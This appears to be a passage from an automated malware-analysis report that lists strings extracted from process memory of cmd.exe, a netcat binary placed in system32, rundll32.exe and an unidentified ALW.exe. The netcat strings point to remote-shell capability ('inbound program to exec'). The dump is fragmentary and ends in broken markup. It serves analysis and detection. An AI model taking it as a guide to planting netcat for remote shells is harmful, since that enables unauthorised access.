keywords to specify</pre><pre>different parsing options. The keywords are:</pre><pre>be passed to the for body for each iteration.</pre><pre>where a back quoted string is executed as a</pre><pre>FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k</pre><pre>would parse each line in myfile.txt, ignoring lines that begin with</pre><pre>a semicolon, passing the 2nd and 3rd token from each line to the for</pre><pre>line, which is passed to a child CMD.EXE and the output is captured</pre><pre>IF CMDEXTVERSION number command</pre><pre>The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is</pre><pre>CMDEXTVERSION conditional is never true when Command Extensions are</pre><pre>%%CMDCMDLINE%% will expand into the original command line passed to</pre><pre>CMD.EXE prior to any processing by CMD.EXE, provided that there is not</pre><pre>already an environment variable with the name CMDCMDLINE, in which case</pre><pre>%%CMDEXTVERSION%% will expand into a string representation of the</pre><pre>current value of CMDEXTVERSION, provided that there is not already</pre><pre>an environment variable with the name CMDEXTVERSION, in which case you</pre><pre>under Windows XP, as command line editing is always enabled.</pre><pre>CMD.EXE was started with the above path as the current directory.</pre><pre>UNC paths are not supported. Defaulting to Windows directory.</pre><pre>CMD does not support UNC paths as current directories.</pre><pre>UNC paths not supported for current directory. Using</pre><pre>to create temporary drive letter to support UNC current</pre><pre>Missing operand.</pre><pre>Missing operator.</pre><pre>The COMSPEC environment variable does not point to CMD.EXE.</pre><pre>The FAT File System only support Last Write Times</pre><pre>of a batch script is reached, an implied ENDLOCAL is executed for any</pre><pre>application execution.</pre><pre>The switch /Y may be present in the COPYCMD environment variable.</pre><pre>to prompt on overwrites unless MOVE command is being executed from</pre><pre>when CMD.EXE started. This value either comes from the current console</pre><pre>The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute</pre>nc.exe_1932:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.idata</pre><pre>.BENu</pre><pre>user32.dll</pre><pre>WaitForMultipleObjects error: %s</pre><pre>Failed to create ReadShell session thread, error = %s</pre><pre>Failed to execute shell</pre><pre>Failed to create shell stdin pipe, error = %s</pre><pre>Failed to create shell stdout pipe, error = %s</pre><pre>Failed to execute shell, error = %s</pre><pre>SessionReadShellThreadFn exitted, error = %s</pre><pre>%s: option `%s' requires an argument</pre><pre>%s: option `%c%s' doesn't allow an argument</pre><pre>%s: option `--%s' doesn't allow an argument</pre><pre>%s: invalid option -- %c</pre><pre>%s: illegal option -- %c</pre><pre>%s: option requires an argument -- %c</pre><pre>%s: unrecognized option `%c%s'</pre><pre>%s: unrecognized option `--%s'</pre><pre>%s: option `%s' is ambiguous</pre><pre>sent %d, rcvd %d</pre><pre>VERNOTSUPPORTED</pre><pre>AFNOSUPPORT</pre><pre>PFNOSUPPORT</pre><pre>SOCKTNOSUPPORT</pre><pre>PROTONOSUPPORT</pre><pre>MSGSIZE</pre><pre>Hmalloc %d failed</pre><pre>DNS fwd/rev mismatch: %s != %s</pre><pre>Warning: forward host lookup failed for %s: h_errno %d</pre><pre>%s: inverse host lookup failed: h_errno %d</pre><pre>Warning: inverse host lookup failed for %s: h_errno %d</pre><pre>%s: forward host lookup failed: h_errno %d</pre><pre>Can't parse %s as an IP address</pre><pre>Warning: port-bynum mismatch, %d != %d</pre><pre>loadports: bogus values %d, %d</pre><pre>loadports: no block?!</pre><pre>Can't grab %s:%d with bind</pre><pre>retrying local %s:%d</pre><pre>connect to [%s] from %s [%s] %d</pre><pre>invalid connection to [%s] from %s [%s] %d</pre><pre>] %d ...</pre><pre>UDP listen needs -p arg</pre><pre>udptest first write failed?! errno %d</pre><pre>Preposterous Pointers: %d, %d</pre><pre>sent %d, rcvd %d</pre><pre>%s [%s] %d (%s)</pre><pre>%s [%s] %d (%s) open</pre><pre>no port[s] to connect to</pre><pre>invalid port %s</pre><pre>can't open %s</pre><pre>invalid wait-time %s</pre><pre>invalid local port %s</pre><pre>invalid interval time %s</pre><pre>invalid hop pointer %d, must be multiple of 4 <= 28</pre><pre>Cmd line:</pre><pre>port numbers can be individual or ranges: m-n [inclusive]</pre><pre>UDP mode</pre><pre>delay interval for lines sent, ports scanned</pre><pre>-p port</pre><pre>local port number</pre><pre>randomize local and remote ports</pre><pre>inbound program to exec [dangerous!!]</pre><pre>nc [-options] hostname port[s] [ports] ...</pre><pre>nc -l -p port [options] [hostname] [port]</pre><pre>c:\windows\system32\nc.exe</pre><pre>DisconnectNamedPipe</pre><pre>CreatePipe</pre><pre>PeekNamedPipe</pre><pre>KERNEL32.dll</pre><pre>WSOCK32.dll</pre><pre>GetCPInfo</pre>rundll32.exe_1532:<pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>msvcrt.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>IMAGEHLP.dll</pre><pre>rundll32.pdb</pre><pre>.....eZXnnnnnnnnnnnn3</pre><pre>....eDXnnnnnnnnnnnn3</pre><pre>...eDXnnnnnnnnnnnn,</pre><pre>.eDXnnnnnnnnnnnn,</pre><pre>%Xnnnnnnnnnnnnnnn1</pre><pre>O3$dS7"%U9</pre><pre>.manifest</pre><pre>5.1.2600.5512 (xpsp.080413-2105)</pre><pre>RUNDLL.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><pre>YThere is not enough memory to run the file %s.</pre><pre>Please close other windows and try again.</pre><pre>9The file %s or one of its components could not be opened.</pre><pre>0The file %s or one of its components cannot run.</pre><pre>MThe file %s or one of its components requires a different version of Windows.</pre><pre>UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"</pre><pre>Error in %s</pre><pre>Missing entry:%s</pre><pre>Error loading %s</pre>ALW.exe_1160:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>udPh</pre><pre>PSSSSSSh</pre><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>.EKSWU</pre><pre>FTPG</pre><pre>FTPj</pre><pre>FtPS</pre><pre>=KNILw.tT=RCNEw</pre><pre>_0 _8 _4;_,</pre><pre>SHA1 block transform for x86, CRYPTOGAMS by <appro></appro></pre><pre>SHA256 block transform for x86, CRYPTOGAMS by <appro></appro></pre><pre>DlSHA512 block transform for x86, CRYPTOGAMS by <appro></appro></pre><pre>Montgomery Multiplication for x86, CRYPTOGAMS by <appro></appro></pre><pre>6-9'6-9'</pre><pre>$6.:$6.:</pre><pre>*?#1*?#1</pre><pre>>8$4,8$4,</pre><pre>AES for x86, CRYPTOGAMS by <appro></appro></pre><pre>Camellia for x86 by <appro></appro></pre><pre>RC4 for x86, CRYPTOGAMS by <appro></appro></pre><pre>FRegDeleteKeyExW</pre><pre>MARGIN-BOTTOM: 11px; BORDER-STYLE: solid; BORDER-COLOR: #DFDFE5; BORDER-WIDTH: 2px; BACKGROUND-COLOR: #DFDFE5; }H2 { COLOR: black; BACKGROUND-COLOR: #FFFFF; FONT-SIZE: 12pt; FONT-WEIGHT: normal; MARGIN-BOTTOM: 0px; MARGIN-TOP: 10px;}</pre></pre></p%C></pre></q3></pre>